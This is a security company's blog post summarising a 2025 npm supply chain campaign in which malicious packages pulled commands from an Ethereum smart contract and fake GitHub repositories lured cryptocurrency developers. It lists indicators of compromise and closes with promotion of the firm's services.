Cybersecurity researchers have uncovered a sophisticated software supply chain attack that weaponized the npm ecosystem using Ethereum smart contracts to conceal malicious payloads. The campaign spanning npm and GitHub highlights the rapidly evolving tactics of threat actors targeting developers and cryptocurrency communities.
How the Attack Unfolded
In July 2025, researchers at ReversingLabs identified two malicious npm packages colortoolsv2 and mimelib2 that used Ethereum smart contracts to deliver downloader malware.
- colortoolsv2 was first published on July 7, 2025.
- mimelib2, an almost identical replacement, appeared later that month after the first package was flagged and removed.
Once included in a developer project, the packages executed an obfuscated payload via index.js. Instead of embedding a hardcoded command-and-control (C2) URL, the malware retrieved malicious commands from a smart contract hosted on the Ethereum blockchain, a tactic rarely seen before in npm attacks.
This second-stage malware was then installed on the victim system, granting attackers persistence and control.
Expanding the Campaign
Investigators uncovered a broader campaign that went beyond npm. Threat actors maintained a network of fraudulent GitHub repositories, including:
- solana-trading-bot-v2
- ethereum-mev-bot-v2
- arbitrage-bot
- hyperliquid-trading-bot
These repositories were designed to appear legitimate, boasting: thousands of fake commits, artificially inflated stars and watchers (via bogus accounts), and multiple puppet maintainers to mimic credibility.
The goal was to trick developers, particularly in the cryptocurrency sector into trusting and integrating the malicious npm packages.
Indicators of Compromise (IoCs)
| Package | Version | SHA1 |
| colortoolsv2 | 1.0.0 | 678c20775ff86b014ae8d9869ce5c41ee06b6215 |
| colortoolsv2 | 1.0.1 | 1bb7b23f45ed80bce33a6b6e6bc4f99750d5a34b |
| colortoolsv2 | 1.0.2 | db86351f938a55756061e9b1f4469ff2699e9e27 |
| mimelib2 | 1.0.0 | bda31e9022f5994385c26bd8a451acf0cd0b36da |
| mimelib2 | 1.0.1 | c5488b605cf3e9e9ef35da407ea848cf0326fdea |
- Second-stage payload SHA1: 021d0eef8f457eb2a9f9fb2260dd2e391f009a21
- Smart contract address: 0x1f117a1b07c108eae05a5bccbe86922d66227e2b
Why This Matters
This campaign represents a new frontier in software supply chain attacks. By abusing smart contracts, immutable and decentralized by nature attackers made it far harder for defenders to block or take down malicious infrastructure.
The campaign also leveraged social engineering at scale, using fake developer activity to lure victims into false trust. Cryptocurrency-focused developers were the primary target, but the techniques could easily be adapted to other industries.
How Our Services Can Help
At CyberTech Nexus, we recognize that modern cyber threats are increasingly blending technical exploits with deception tactics. Here’s how our services can protect organizations and individuals against such evolving risks:
- IT & Cybersecurity Consultancy – Strategic guidance to design resilient development and deployment environments resistant to supply chain compromises.
- Security Audits & Vulnerability Assessments – Deep code and dependency reviews to identify risks in open-source libraries before integration.
- Incident Response & Recovery – Rapid containment, eradication, and recovery in case of compromise from malicious packages.
- Managed Security Services (MSS) – Continuous monitoring of repositories, endpoints, and blockchain interactions to detect emerging threats.
- Penetration Testing – Simulating supply chain attacks, including npm and GitHub compromise scenarios, to assess organizational preparedness.
- Compliance & Regulatory Services – Aligning with frameworks such as NIST SSDF and GDPR to strengthen software supply chain security.
- Cyber Protection Academy – Training developers and teams to identify malicious packages, fake repositories, and signs of tampering.
- Cybersecurity Recruitment Services – Helping businesses build teams equipped with the right skills to mitigate complex, evolving attacks.
Conclusion
This npm campaign demonstrates how attackers are weaponizing blockchain technology in unexpected ways to evade detection. By combining technical innovation with social engineering, they continue to blur the lines between legitimate development ecosystems and malicious operations.
Organizations and individuals alike must adopt a multi-layered cybersecurity approach, one that includes regular audits, dependency validation, user awareness, and rapid incident response to stay ahead of these threats.
At CyberTech Nexus, we stand ready to protect your digital ecosystem from today’s most sophisticated cyber threats.
References
- ReversingLabs. Ethereum Smart Contracts Used in npm Supply Chain Attack.
- The Hacker News. Malicious npm Packages Abuse Blockchain to Deliver Malware.
- Ethereum Foundation. Smart Contracts Documentation.
- CISA – Software Supply Chain Guidance.